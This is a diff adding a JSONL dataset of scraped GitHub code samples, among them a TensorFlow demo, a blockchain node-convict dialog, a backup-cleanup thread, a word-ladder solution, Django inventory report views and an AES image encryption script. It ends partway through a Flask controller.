diff --git "a/303.jsonl" "b/303.jsonl" new file mode 100644--- /dev/null +++ "b/303.jsonl" @@ -0,0 +1,1601 @@ +{"seq_id":"2500150661","text":"import tensorflow as tf\n\nvar = tf.Variable(0)\nholder = tf.placeholder(tf.int32)\napp_op = tf.add(var, holder)\nupdate_var = tf.assign(var ,add_op)\nmul_op = tf.mul(add_op, update_var)\n\nwith tf.Session() as session:\n summary_writer = tf.train.SummaryWriter('/var/log', graph = session.graph)\n session.run(tf.initialize_all_variables())\n\n result = session.run(mul_op, feed_dict={ holder: 5})\n\n print(result)\n","repo_name":"tamakiii-sandbox/hello-tensorflow","sub_path":"src/sample.py","file_name":"sample.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"19113808544","text":"import re\n\nimport in3\nfrom PySide2.QtWidgets import QDialog, QGroupBox, QLabel, QFormLayout, QLineEdit, QPushButton\n\nfrom blockchain.functions_signatures import CONVICT\n\n\"\"\"\nThis is the modal window to convict other node\n\"\"\"\nclass Convict(QDialog):\n\n def __init__(self, client):\n # Creating modal window to form request for contract\n QDialog.__init__(self)\n self.client = client\n self.modal_group_box = QGroupBox(\"Node\")\n self.modal_error_label = QLabel(\"Wrong address, account must be written in form : '0x...'.\")\n self.modal_group_layout = QFormLayout()\n self.hash_line = QLineEdit()\n self.modal_error_label.hide()\n\n self.hash_label = QLabel(\"\")\n self.hash_label.hide()\n\n self.modal_group_layout.addRow(QLabel(\"Convict node:\"))\n self.modal_group_layout.addRow(self.modal_error_label)\n self.modal_group_layout.addRow(self.hash_label)\n self.modal_group_layout.addRow(QLabel(\"Hash:\"), self.hash_line)\n self.modal_convict_btn = QPushButton(\"Convict\")\n self.p_key = \"\"\n self.contract = \"\"\n\n self.modal_cancel = QPushButton(\"Close\")\n self.modal_cancel.clicked.connect(self.modal_cancel_func)\n self.modal_convict_btn.clicked.connect(self.modal_convict)\n self.modal_group_layout.addRow(self.modal_convict_btn, self.modal_cancel)\n self.setLayout(self.modal_group_layout)\n\n \"\"\"\n Cancel function closes modal window\n \"\"\"\n def modal_cancel_func(self):\n self.modal_error_label.hide()\n self.hide()\n\n \"\"\"\n This function checks input data(hash provded) and sends transaction to the registry instance\n \"\"\"\n def modal_convict(self):\n if not re.match(\"0x[0-9A-Fa-f]{64}\", self.hash_line.text()):\n self.modal_error_label.setText(\"Wrong input. Hash should be written in the hexadecimal form(64 symbols of hash) in format: 0x...\")\n self.modal_error_label.show()\n return\n\n self.modal_error_label.hide()\n convict_node_abi = CONVICT\n sender = self.client.eth.account.recover('0x'+self.p_key)\n convict_node_tx = {\n \"to\": self.contract,\n \"gasLimit\": 200000,\n \"data\": self.client.eth.contract.encode(convict_node_abi, self.hash_line.text())\n }\n\n tx_hash = self.client.eth.account.send_transaction(sender, in3.eth.NewTransaction(**convict_node_tx))\n self.hash_label.setText(\"Latest transaction hash is: \" + tx_hash)\n self.hash_label.show()\n\n# a7ffc6f8bf1ed76651c14756a061d662f580ff4de43b49fa82d80a4b80f8434a\n# bfbfbb1ed01fe85d529582b556e398a735c6a4110e7f9cce414d0d92ca7ca5c3","repo_name":"BritikovKI/incubed_cli","sub_path":"ui/contract_functions/convict_modal.py","file_name":"convict_modal.py","file_ext":"py","file_size_in_byte":2672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"19800780750","text":"\"\"\"\n\nA threaded class to clean old files.\n\n\"\"\"\n\nimport threading as thd\nimport os, time\n\nfrom function.configure import config\nfrom function.findFilesToClean import findFilesToClean, findFilesToCleanInRootOnly\n\n\n\nclass CleanThread(thd.Thread):\n def __init__(self, output, dirs):\n thd.Thread.__init__(self)\n self.output = output\n self.dirs = dirs\n\n\n def run(self):\n out = self.output\n\n colorUI = config['terminal']['colorCleanUI']\n colorClean = config['terminal']['colorCleanFile']\n\n out.setColorUI(colorUI)\n\n print(\"\\n\\n\")\n out.header()\n out.line()\n out.lineCentered(\"Starting Clean\", colorUI)\n out.line()\n out.footer()\n print(\"\")\n\n for k, v in sorted(self.dirs.items()):\n if k[-1] == \"*\":\n # Clean root directory:\n filesToClean = findFilesToCleanInRootOnly(v['src'], v['dest'])\n\n self.cleanSingleDirectory(k[:-1] + \" (just files)\",\n v['src'],\n v['dest'],\n filesToClean,\n colorUI,\n colorClean)\n\n # Clean subdirectories:\n for d in os.listdir(v['src']):\n if os.path.isdir(v['src'] + \"/\" + d):\n filesToClean = findFilesToClean(v['src'] + \"/\" + d,\n v['dest'] + \"/\" + d)\n\n self.cleanSingleDirectory(k[:-1] + \" (\" + d + \")\", \n v['src'] + \"/\" + d,\n v['dest'] + \"/\" + d,\n filesToClean, \n colorUI, \n colorClean)\n else:\n filesToClean = findFilesToClean(v['src'], v['dest'])\n\n self.cleanSingleDirectory(k, \n v['src'], \n v['dest'],\n filesToClean,\n colorUI,\n colorClean)\n\n\n print(\"\")\n out.header()\n out.line()\n out.lineCentered(\"Clean Complete\", colorUI)\n out.line()\n out.footer()\n print(\"\")\n\n out.setColorUI(config['terminal']['colorMenuUI'])\n\n\n\n\n\n def cleanSingleDirectory(self, name, src, dest, filesToClean, colorUI, colorClean):\n out = self.output\n\n print(\"\")\n time.sleep(int(config['general']['backupPause']))\n\n # Print header:\n out.header()\n out.lineCentered(name, colorUI)\n out.line()\n\n # Print src and dest:\n out.line(\"Source :: \" + src, colorUI)\n out.line(\"Destination :: \" + dest, colorUI)\n out.line()\n out.separator()\n out.line()\n\n\n # Do clean:\n numFiles = 0\n\n for f in filesToClean:\n if f[0] != 'C' and f[0] != 'c':\n if os.path.isdir(f):\n os.removedirs(f)\n\n elif os.path.isfile(f):\n os.remove(f)\n\n f = f[len(dest)+1:]\n f = f.replace(\"\\\\\", \"/\")\n\n out.line(f, colorClean)\n numFiles += 1\n\n out.line(\"{} File(s) removed\".format(numFiles))\n\n # Print footer:\n out.line()\n out.footer()\n print(\"\")\n\n\n\n","repo_name":"greene-giant/app-backup","sub_path":"src/function/cleanThread.py","file_name":"cleanThread.py","file_ext":"py","file_size_in_byte":3659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"44789253299","text":"\"\"\"\n给定两个单词(beginWord 和 endWord)和一个字典 wordList,找出所有从 beginWord 到 endWord 的最短转换序列。转换需遵循如下规则:\n\n每次转换只能改变一个字母。\n转换后得到的单词必须是字典中的单词。\n说明:\n\n如果不存在这样的转换序列,返回一个空列表。\n所有单词具有相同的长度。\n所有单词只由小写字母组成。\n字典中不存在重复的单词。\n你可以假设 beginWord 和 endWord 是非空的,且二者不相同。\n示例 1:\n\n输入:\nbeginWord = \"hit\",\nendWord = \"cog\",\nwordList = [\"hot\",\"dot\",\"dog\",\"lot\",\"log\",\"cog\"]\n\n输出:\n[\n [\"hit\",\"hot\",\"dot\",\"dog\",\"cog\"],\n  [\"hit\",\"hot\",\"lot\",\"log\",\"cog\"]\n]\n示例 2:\n\n输入:\nbeginWord = \"hit\"\nendWord = \"cog\"\nwordList = [\"hot\",\"dot\",\"dog\",\"lot\",\"log\"]\n\n来源:力扣(LeetCode)\n链接:https://leetcode-cn.com/problems/word-ladder-ii\n著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。\n\n\"\"\"\nfrom collections import defaultdict\nfrom typing import List\nfrom collections import deque\nimport string\n\n\n# 2021.03.21 直奔题解,这道题是真难啊\nclass Solution:\n def findLadders(self, beginWord: str, endWord: str, wordList: List[str]) -> List[List[str]]:\n # 先将 wordList 放到哈希表里,便于判断某个单词是否在 wordList 里\n word_set = set(wordList)\n res = []\n if len(word_set) == 0 or endWord not in word_set:\n return res\n\n successors = defaultdict(set)\n # 第 1 步:使用广度优先遍历得到后继结点列表 successors\n # key:字符串,value:广度优先遍历过程中 key 的后继结点列表\n found = self.__bidirectional_bfs(beginWord, endWord, word_set, successors)\n if not found:\n return res\n # 第 2 步:基于后继结点列表 successors ,使用回溯算法得到所有最短路径列表\n path = [beginWord]\n self.__dfs(beginWord, endWord, successors, path, res)\n return res\n\n def __bidirectional_bfs(self, beginWord, endWord, word_set, successors):\n visited = set()\n visited.add(beginWord)\n visited.add(endWord)\n\n begin_visited = set()\n begin_visited.add(beginWord)\n\n end_visited = set()\n end_visited.add(endWord)\n\n found = False\n forward = True\n word_len = len(beginWord)\n while begin_visited:\n if len(begin_visited) > len(end_visited):\n begin_visited, end_visited = end_visited, begin_visited\n forward = not forward\n\n next_level_visited = set()\n for current_word in begin_visited:\n word_list = list(current_word)\n for j in range(word_len):\n origin_char = word_list[j]\n for k in string.ascii_lowercase:\n word_list[j] = k\n next_word = ''.join(word_list)\n if next_word in word_set:\n if next_word in end_visited:\n found = True\n # 在另一侧找到单词以后,还需把这一层关系添加到「后继结点列表」\n self.__add_to_successors(successors, forward, current_word, next_word)\n if next_word not in visited:\n next_level_visited.add(next_word)\n self.__add_to_successors(successors, forward, current_word, next_word)\n word_list[j] = origin_char\n begin_visited = next_level_visited\n # 取两集合全部的元素(并集,等价于将 next_level_visited 里的所有元素添加到 visited 里)\n visited |= next_level_visited\n if found:\n break\n return found\n\n def __add_to_successors(self, successors, forward, current_word, next_word):\n if forward:\n successors[current_word].add(next_word)\n else:\n successors[next_word].add(current_word)\n\n def __dfs(self, beginWord, endWord, successors, path, res):\n if beginWord == endWord:\n res.append(path[:])\n return\n\n if beginWord not in successors:\n return\n\n successor_words = successors[beginWord]\n for next_word in successor_words:\n path.append(next_word)\n self.__dfs(next_word, endWord, successors, path, res)\n path.pop()\n","repo_name":"ZhiyuSun/leetcode-practice","sub_path":"101-200/126_单词接龙II.py","file_name":"126_单词接龙II.py","file_ext":"py","file_size_in_byte":4573,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"16"} +{"seq_id":"38983611909","text":"from django.db.models import Sum, F, Window, Q, Prefetch, Subquery, OuterRef\nfrom django.db.models.functions.comparison import Coalesce\nfrom rest_framework import generics\nfrom rest_framework.pagination import LimitOffsetPagination\nfrom rest_framework.permissions import IsAuthenticated\n\nfrom factors.models import Factor\nfrom factors.models.factor import FactorItem\nfrom helpers.auth import BasicCRUDPermission\nfrom helpers.querysets import get_deep_sum\nfrom reports.inventory.filters import InventoryFilter, AllWaresInventoryFilter\nfrom reports.inventory.serializers import WareInventorySerializer, AllWaresInventorySerializer, \\\n WarehouseInventorySerializer, AllWarehousesInventorySerializer\nfrom reports.lists.export_views import BaseListExportView\nfrom wares.models import Ware, Warehouse\n\nINVENTORY_INPUT_GROUP = Factor.INPUT_GROUP\nINVENTORY_OUTPUT_GROUP = Factor.OUTPUT_GROUP\n\n\ndef addSum(queryset, data):\n if len(data) > 0:\n remain = data[-1]['remain']\n else:\n remain = 0\n data.append({\n 'factor': {\n 'explanation': 'مجموع',\n },\n 'remain': remain,\n 'input': {\n 'count': queryset.filter(factor__type__in=INVENTORY_INPUT_GROUP).aggregate(Sum('count'))['count__sum'],\n 'fee': '-',\n 'value': queryset.filter(factor__type__in=INVENTORY_INPUT_GROUP).aggregate(value=Sum('calculated_value'))[\n 'value'\n ]\n },\n 'output': {\n 'count': queryset.filter(factor__type__in=INVENTORY_OUTPUT_GROUP).aggregate(Sum('count'))['count__sum'],\n 'fee': '-',\n 'value': queryset.filter(factor__type__in=INVENTORY_OUTPUT_GROUP).aggregate(\n value=Sum('calculated_value')\n )['value'],\n }\n })\n\n\nware_common_headers = [\n 'مقدار وارده',\n 'فی وارده',\n 'مبلغ وارده',\n 'مقدار صادره',\n 'فی صادره',\n 'مبلغ صادره',\n 'مقدار مانده',\n 'فی مانده',\n 'مبلغ مانده',\n]\n\n\ndef get_ware_common_columns(item):\n return [\n item['input']['count'],\n item['input']['fee'],\n item['input']['value'],\n item['output']['count'],\n item['output']['fee'],\n item['output']['value'],\n item['remain']['count'],\n item['remain']['fee'],\n item['remain']['value'],\n ]\n\n\nwarehouse_common_headers = [\n 'مقدار وارده',\n 'مقدار صادره',\n 'مقدار مانده',\n]\n\n\ndef get_warehouse_common_columns(item):\n return [\n item['input'],\n item['output'],\n item['remain'],\n ]\n\n\nclass WareInventoryListView(generics.ListAPIView):\n permission_classes = (IsAuthenticated, BasicCRUDPermission)\n permission_codename = 'get.wareInventoryReport'\n serializer_class = WareInventorySerializer\n filterset_class = InventoryFilter\n ordering_fields = '__all__'\n pagination_class = LimitOffsetPagination\n\n def get_queryset(self):\n queryset = FactorItem.objects.inFinancialYear().filter(\n factor__is_defined=True,\n # factor__type__in=(\n # *Factor.SALE_GROUP,\n # *Factor.BUY_GROUP,\n # Factor.INPUT_ADJUSTMENT,\n # Factor.OUTPUT_ADJUSTMENT,\n # Factor.INPUT_TRANSFER,\n # Factor.OUTPUT_TRANSFER,\n # Factor.CONSUMPTION_WARE\n # )\n ).prefetch_related(\n 'factor__account',\n 'factor__sanad'\n ).order_by('factor__definition_date', 'id')\n\n queryset = queryset.annotate(\n definition_date=F('factor__definition_date'),\n type=F('factor__type')\n )\n\n queryset = queryset.annotate(\n comulative_input_count=Window(\n expression=Sum('count', filter=Q(type__in=INVENTORY_INPUT_GROUP)),\n order_by=(F('definition_date'), F('id'))\n ),\n comulative_output_count=Window(\n expression=Sum('count', filter=Q(type__in=INVENTORY_OUTPUT_GROUP)),\n order_by=(F('definition_date'), F('id'))\n ),\n )\n\n queryset = self.filter_queryset(queryset)\n\n return queryset\n\n def list(self, request, *args, **kwargs):\n queryset = self.get_queryset()\n\n paginator = self.pagination_class()\n page = paginator.paginate_queryset(queryset, request)\n\n serializer = self.serializer_class(page, many=True)\n data = serializer.data\n\n if len(data) and paginator.offset + paginator.limit >= paginator.count:\n addSum(queryset, data)\n\n response = paginator.get_paginated_response(data)\n return response\n\n\nclass WareInventoryExportView(WareInventoryListView, BaseListExportView):\n filename = 'Ware Inventory'\n title = 'کاردکس کالا'\n\n def get_additional_data(self):\n item = self.get_queryset().first()\n if item:\n return [\n {\n 'text': 'کالا',\n 'value': item.ware.name\n },\n {\n 'text': 'انبار',\n 'value': item.warehouse.name\n }\n ]\n return []\n\n def get_rows(self):\n qs = super().get_rows()\n data = self.serializer_class(qs, many=True).data\n addSum(qs, data)\n return data\n\n def get(self, request, *args, **kwargs):\n return self.get_response(request, *args, **kwargs)\n\n\nclass AllWaresInventoryListView(generics.ListAPIView):\n permission_classes = (IsAuthenticated, BasicCRUDPermission)\n permission_codename = 'get.allWaresInventoryReport'\n serializer_class = AllWaresInventorySerializer\n filterset_class = AllWaresInventoryFilter\n ordering_fields = '__all__'\n pagination_class = LimitOffsetPagination\n\n def get_queryset(self):\n financial_year = self.request.user.active_financial_year\n last_factor_item = Subquery(\n FactorItem.objects.inFinancialYear().filter(\n ware_id=OuterRef('ware_id')\n ).filter(\n factor__is_defined=True,\n # factor__type__in=(\n # *Factor.SALE_GROUP,\n # *Factor.BUY_GROUP,\n # Factor.INPUT_ADJUSTMENT,\n # Factor.OUTPUT_ADJUSTMENT,\n # Factor.CONSUMPTION_WARE\n # )\n ).order_by('factor__definition_date').values_list('id', flat=True)[:1]\n )\n\n input_filter = {\n 'factorItems__factor__is_defined': True,\n # 'factorItems__factor__type__in': Factor.BUY_GROUP,\n 'factorItems__factor__type__in': INVENTORY_INPUT_GROUP,\n 'factorItems__financial_year': financial_year,\n }\n\n output_filter = {\n 'factorItems__factor__is_defined': True,\n # 'factorItems__factor__type__in': (*Factor.SALE_GROUP, Factor.CONSUMPTION_WARE),\n 'factorItems__factor__type__in': INVENTORY_OUTPUT_GROUP,\n 'factorItems__financial_year': financial_year,\n }\n\n queryset = Ware.objects.inFinancialYear().prefetch_related(\n Prefetch('factorItems', queryset=FactorItem.objects.filter(id__in=last_factor_item))\n ).annotate(\n input_count=get_deep_sum('factorItems__count', filters=input_filter),\n input_value=get_deep_sum('factorItems__calculated_value', filters=input_filter),\n output_count=get_deep_sum('factorItems__count', filters=output_filter),\n output_value=get_deep_sum('factorItems__calculated_value', filters=output_filter),\n )\n\n queryset = queryset.annotate(\n remain_count=Coalesce(F('input_count') - F('output_count'), 0)\n )\n\n status = self.request.GET.get('status', 'all')\n if status == 'withRemain':\n queryset = queryset.filter(~Q(remain_count=0))\n elif status == 'withoutRemain':\n queryset = queryset.filter(remain_count=0)\n elif status == 'withTransaction':\n queryset = queryset.filter(~Q(input_count=0) | ~Q(output_count=0))\n elif status == 'withoutTransaction':\n queryset = queryset.filter(input_count=0, output_count=0)\n\n return queryset\n\n def add_sum(self, queryset, data):\n totals = queryset.aggregate(\n total_input_count=Sum('input_count'),\n total_input_value=Sum('input_value'),\n total_output_count=Sum('output_count'),\n total_output_value=Sum('output_value'),\n )\n data.append({\n 'name': 'مجموع',\n 'input': {\n 'count': totals['total_input_count'],\n 'fee': ' - ',\n 'value': totals['total_input_value']\n },\n 'output': {\n 'count': totals['total_output_count'],\n 'fee': ' - ',\n 'value': totals['total_output_value']\n },\n 'remain': {\n 'count': totals['total_input_count'] - totals['total_output_count'],\n 'fee': ' - ',\n 'value': totals['total_input_value'] - totals['total_output_value']\n },\n })\n\n def list(self, request, *args, **kwargs):\n params = self.request.GET\n\n factor_items = self.get_queryset()\n\n queryset = self.filterset_class(params, queryset=factor_items).qs\n\n paginator = self.pagination_class()\n page = paginator.paginate_queryset(queryset, request)\n\n serializer = self.serializer_class(page, many=True)\n data = serializer.data\n\n if len(data) and paginator.offset + paginator.limit >= paginator.count:\n self.add_sum(queryset, data)\n\n response = paginator.get_paginated_response(data)\n return response\n\n\nclass AllWaresInventoryExportView(AllWaresInventoryListView, BaseListExportView):\n filename = 'All Ware Inventory'\n title = 'کاردکس همه کالا ها'\n\n def get_rows(self):\n qs = super().get_rows()\n data = self.serializer_class(qs, many=True).data\n self.add_sum(qs, data)\n return data\n\n def get(self, request, *args, **kwargs):\n return self.get_response(request, *args, **kwargs)\n\n\nclass WarehouseInventoryListView(generics.ListAPIView):\n permission_classes = (IsAuthenticated, BasicCRUDPermission)\n permission_codename = 'get.warehouseInventoryReport'\n serializer_class = WarehouseInventorySerializer\n filterset_class = InventoryFilter\n ordering_fields = '__all__'\n pagination_class = LimitOffsetPagination\n\n def get_queryset(self):\n queryset = FactorItem.objects.inFinancialYear().filter(\n factor__is_defined=True\n ).prefetch_related(\n 'factor__account',\n 'factor__sanad',\n 'warehouse'\n ).order_by(\n 'factor__definition_date', 'id'\n ).annotate(\n definition_date=F('factor__definition_date'),\n type=F('factor__type')\n ).annotate(\n cumulative_input_count=Window(\n expression=Sum('count', filter=Q(type__in=INVENTORY_INPUT_GROUP)),\n order_by=[F('definition_date').asc(), F('id').asc()]\n ),\n cumulative_output_count=Window(\n expression=Sum('count', filter=Q(type__in=INVENTORY_OUTPUT_GROUP)),\n order_by=[F('definition_date').asc(), F('id').asc()]\n )\n )\n\n return queryset\n\n def add_sum(self, data):\n data.append({\n 'factor': {\n 'account': {\n 'name': 'جمع'\n }\n },\n 'input': data[-1]['cumulative_count']['input'],\n 'output': data[-1]['cumulative_count']['output'],\n 'remain': data[-1]['remain']\n })\n\n def list(self, request, *args, **kwargs):\n params = self.request.GET\n\n factor_items = self.get_queryset()\n\n queryset = self.filterset_class(params, queryset=factor_items).qs\n\n paginator = self.pagination_class()\n page = paginator.paginate_queryset(queryset, request)\n\n serializer = self.serializer_class(page, many=True)\n data = serializer.data\n\n if len(data) and paginator.offset + paginator.limit >= paginator.count:\n self.add_sum(data)\n\n response = paginator.get_paginated_response(data)\n return response\n\n\nclass WarehouseInventoryExportView(WarehouseInventoryListView, BaseListExportView):\n filename = 'Warehouse Inventory'\n title = 'کاردکس کالا'\n\n def get_additional_data(self):\n item = self.get_queryset().first()\n if item:\n return [\n {\n 'text': 'کالا',\n 'value': item.ware.name\n },\n {\n 'text': 'انبار',\n 'value': item.warehouse.name if self.request.GET.get('warehouse') else 'همه انبار ها'\n }\n ]\n return []\n\n def get_rows(self):\n qs = super().get_rows()\n data = self.serializer_class(qs, many=True).data\n self.add_sum(data)\n return data\n\n def get(self, request, *args, **kwargs):\n return self.get_response(request, *args, **kwargs)\n\n\nclass AllWarehousesInventoryListView(generics.ListAPIView):\n permission_classes = (IsAuthenticated, BasicCRUDPermission)\n permission_codename = 'get.allWarehousesInventoryReport'\n serializer_class = AllWarehousesInventorySerializer\n filterset_class = AllWaresInventoryFilter\n ordering_fields = '__all__'\n pagination_class = LimitOffsetPagination\n\n def get_queryset(self):\n warehouse = self.request.GET.get('warehouse', None)\n financial_year = self.request.user.active_financial_year\n\n input_filter = {\n 'factorItems__factor__is_defined': True,\n 'factorItems__factor__financial_year': financial_year,\n 'factorItems__factor__type__in': INVENTORY_INPUT_GROUP\n }\n\n output_filter = {\n 'factorItems__factor__is_defined': True,\n 'factorItems__factor__financial_year': financial_year,\n 'factorItems__factor__type__in': INVENTORY_OUTPUT_GROUP\n }\n\n queryset = Ware.objects.inFinancialYear()\n\n if warehouse:\n input_filter['factorItems__warehouse_id'] = warehouse\n output_filter['factorItems__warehouse_id'] = warehouse\n\n queryset = queryset.filter(\n Q(warehouse_id=warehouse) |\n Q(children__warehouse_id=warehouse) |\n Q(children__children__warehouse_id=warehouse) |\n Q(children__children__children__warehouse_id=warehouse) |\n\n (\n Q(factorItems__warehouse_id=warehouse) &\n Q(factorItems__factor__financial_year=financial_year)\n ) | (\n Q(children__factorItems__warehouse_id=warehouse) &\n Q(children__factorItems__factor__financial_year=financial_year)\n ) | (\n Q(children__children__factorItems__warehouse_id=warehouse) &\n Q(children__children__factorItems__factor__financial_year=financial_year)\n ) | (\n Q(children__children__children__factorItems__warehouse_id=warehouse) &\n Q(children__children__factorItems__factor__financial_year=financial_year)\n )\n\n )\n\n queryset = queryset.annotate(\n input=get_deep_sum('factorItems__count', filters=input_filter),\n output=get_deep_sum('factorItems__count', filters=output_filter)\n )\n\n queryset = queryset.annotate(\n remain=Coalesce(F('input') - F('output'), 0)\n\n )\n\n status = self.request.GET.get('status', 'all')\n if status == 'withRemain':\n queryset = queryset.filter(~Q(remain=0))\n elif status == 'withoutRemain':\n queryset = queryset.filter(remain=0)\n elif status == 'withTransaction':\n queryset = queryset.filter(~Q(input=0) | ~Q(output=0))\n elif status == 'withoutTransaction':\n queryset = queryset.filter(input=0, output=0)\n\n return queryset\n\n def add_sum(self, queryset, data):\n totals = queryset.aggregate(\n total_input_count=Sum('input'),\n total_output_count=Sum('output'),\n )\n data.append({\n 'name': 'جمع',\n 'input': totals['total_input_count'],\n 'output': totals['total_output_count'],\n 'remain': totals['total_input_count'] - totals['total_output_count']\n })\n\n def list(self, request, *args, **kwargs):\n queryset = self.filter_queryset(self.get_queryset())\n\n paginator = self.pagination_class()\n page = paginator.paginate_queryset(queryset, request)\n\n serializer = self.serializer_class(page, many=True)\n data = serializer.data\n\n if len(data) and paginator.offset + paginator.limit >= paginator.count:\n self.add_sum(queryset, data)\n\n response = paginator.get_paginated_response(data)\n return response\n\n\nclass AllWarehousesInventoryExportView(AllWarehousesInventoryListView, BaseListExportView):\n filename = 'All Warehouses Inventory'\n title = 'کاردکس انبار همه کالا ها'\n\n def get_additional_data(self):\n data = self.request.GET.copy()\n warehouse = data.get('warehouse')\n if warehouse:\n warehouse = Warehouse.objects.get(pk=warehouse).name\n else:\n warehouse = 'همه انبار ها'\n\n return [\n {\n 'text': 'انبار',\n 'value': warehouse\n }\n ]\n\n def get_rows(self):\n qs = super().get_rows()\n data = self.serializer_class(qs, many=True).data\n self.add_sum(qs, data)\n return data\n\n def get(self, request, *args, **kwargs):\n return self.get_response(request, *args, **kwargs)\n","repo_name":"sorooshmorshedi/back","sub_path":"reports/inventory/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":18218,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"17647070005","text":"\"\"\" \nThis code is to encrypt and decrypt image(s).\nAuthor: Mrinal Kanti Dhar\nCo-author: ChatGPT\n\"\"\"\n\nfrom cryptography.hazmat.primitives import padding\nfrom cryptography.hazmat.backends import default_backend\nfrom cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes\nimport os\n\ndef encryt(im_loc, encrypted_im_name:str='encrypted_image.bin', key_name:str='key.bin', \n salt_byte:int=16, key_byte:int=32, iv_byte:int=16):\n \n \"\"\" This function encrypts an input\n \n Inputs\n ========\n im_loc (str): Entire image location including the image name with extension.\n encrypted_im_name (str): Name that will be used to store the encrypted image.\n key_name (str): Name that will be used to store the key.\n salt_byte (int): Byte value for salt that will be added to the input image. The value indicates a byte value.\n key_byte (int): Byte value to generate key randomly.\n iv_byte (int): Byte value to generate Initialization Vector randomly. \n \n \"\"\"\n \n # Generate a random salt\n salt = os.urandom(salt_byte) # 16 bytes\n \n key = os.urandom(key_byte) # 32 bytes\n \n iv = os.urandom(iv_byte) # 16 bytes\n \n # Create a Cipher object\n cipher = Cipher(algorithms.AES(key), modes.CBC(iv), backend=default_backend())\n \n # Create an encryptor\n encryptor = cipher.encryptor()\n \n # Read the image data\n with open(im_loc, 'rb') as img_file:\n image_data = img_file.read()\n \n # Apply PKCS7 padding to the image data\n padder = padding.PKCS7(128).padder()\n padded_image_data = padder.update(image_data) + padder.finalize()\n \n # Encrypt the padded image data\n ct = encryptor.update(padded_image_data) + encryptor.finalize()\n \n # Write the encrypted data to a file\n with open(encrypted_im_name, 'wb') as encrypted_file:\n encrypted_file.write(salt + iv + ct)\n \n # save the key\n with open(key_name, \"wb\") as k:\n k.write(key)\n\n#%% Decrypt\ndef decrypt(encrypted_im_loc, key_loc, decrypted_im_name:str='decrypted_image.jpg',\n salt_byte:int=16, key_byte:int=32, iv_byte:int=16):\n \"\"\" This function decrypt an encrypted image\n Inputs\n =========\n encrypted_im_loc (str): Entire encrypted image location including the image name with extension.\n key_loc (str): Entire key location including the image name with extension.\n decrypted_im_name (str): Name that will be used to store the decrypted image.\n salt_byte (int): Byte value for salt.\n key_byte (int): Byte value for key.\n iv_byte (int): Byte value for Initialization Vector.\n \"\"\"\n # Read the encrypted data from the file\n with open(encrypted_im_loc, 'rb') as encrypted_file:\n encrypted_data = encrypted_file.read()\n \n # Extract the salt, IV, and ciphertext from the encrypted data\n salt = encrypted_data[:salt_byte]\n iv = encrypted_data[salt_byte:salt_byte+iv_byte]\n ct = encrypted_data[salt_byte+iv_byte:]\n \n # Read key\n with open(key_loc, 'rb') as k:\n key = k.read()\n \n # Create a Cipher object for decryption\n cipher = Cipher(algorithms.AES(key), modes.CBC(iv), backend=default_backend())\n \n # Create a decryptor\n decryptor = cipher.decryptor()\n \n # Decrypt the ciphertext\n padded_image_data = decryptor.update(ct) + decryptor.finalize()\n \n # Remove PKCS7 padding\n unpadder = padding.PKCS7(128).unpadder()\n image_data = unpadder.update(padded_image_data)\n try:\n image_data += unpadder.finalize()\n except ValueError:\n # Padding is not valid, so just use the unpadded data\n pass\n \n # Write the decrypted image data to a file\n with open(decrypted_im_name, 'wb') as decrypted_file:\n decrypted_file.write(image_data)\n\n#%%\nif __name__ == \"__main__\":\n import time\n \n root = r'D:\\Mou\\kvasir-dataset-v2\\dyed-lifted-polyps' # this dir contains all images\n \n encrypt_dir = r'D:\\Mou\\encrypted' # where the encrypted images will stored\n decrypt_dir = r'D:\\Mou\\decrypted' # where the decrypted images will stored \n key_dir = r'D:\\Mou\\keys' # where the keys will be stored\n \n os.makedirs(encrypt_dir, exist_ok=True)\n os.makedirs(decrypt_dir, exist_ok=True)\n os.makedirs(key_dir, exist_ok=True)\n \n names = os.listdir(root)\n \n start = time.time()\n \n #%% Encryption\n for name in names:\n name_only = os.path.splitext(name)[0]\n im_loc = os.path.join(root, name)\n \n encryt(im_loc, \n encrypted_im_name=os.path.join(encrypt_dir, name_only+'.bin'), \n key_name=os.path.join(key_dir, name_only+'.bin'), \n salt_byte=16, key_byte=32, iv_byte=16)\n \n end = time.time()\n encrypt_time = end - start\n \n #%% Decryption\n start = time.time()\n for name in names:\n name_only = os.path.splitext(name)[0]\n encrypted_im_loc = os.path.join(encrypt_dir, name_only + '.bin')\n key_loc = os.path.join(key_dir, name_only+'.bin')\n \n decrypt(encrypted_im_loc, key_loc, \n decrypted_im_name=os.path.join(decrypt_dir, name),\n salt_byte=16, key_byte=32, iv_byte=16)\n\n end = time.time()\n decrypt_time = end - start\n \n with open('crypto_time.txt', \"w\") as f:\n print(\"Encryption time:\", encrypt_time, file=f)\n print(\"Decryption time:\", decrypt_time, file=f)\n \n \n","repo_name":"mrinal054/my_utils","sub_path":"crypto.py","file_name":"crypto.py","file_ext":"py","file_size_in_byte":5449,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"12165420090","text":"#!/usr/bin/env python3\n\n\nimport sys\nfrom consts import path_on_servers\n\n\nclass Binary:\n\n def __init__(self, path, server):\n self.path_local = path\n self.server = server\n self.path_on_server = \"{}/binary\".format(path_on_servers)\n\n def setup(self):\n ex = self.server.copy_executable(self.path_local, path_on_servers,\n \"binary\")\n if ex != 0:\n err = \"Error while setting up binary on {}\".format(self.server.ip)\n sys.exit(err)\n","repo_name":"sakshamsharma/distributed-control-panel","sub_path":"dcp/binary.py","file_name":"binary.py","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"39693468030","text":"from flask import Blueprint as Controller, request\n\nfrom common import Result\nfrom service import SysParamsService\nfrom decorator import has_authority, operate_log\n\nsys_params_controller = Controller(\"sys_params\", __name__, url_prefix='/sys/params')\n\n\n@sys_params_controller.route(\"/page\", methods=['GET'])\n@has_authority(\"sys:params:all\")\ndef page():\n return 